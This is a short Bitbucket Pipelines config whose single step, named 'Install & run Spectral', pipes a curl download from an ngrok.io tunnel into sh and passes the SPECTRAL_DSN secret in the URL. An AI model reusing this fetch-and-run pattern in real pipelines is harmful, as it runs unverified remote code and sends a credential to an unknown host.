image: atlassian/default-image:2
          
pipelines:
  default:
    - parallel:
      - step:
          name: 'Install & run Spectral'
          script:
            - curl -L "https://44e368688928.ngrok.io/latest/x/sh?dsn=$SPECTRAL_DSN" | sh
            - $HOME/.spectral/spectral scan --ok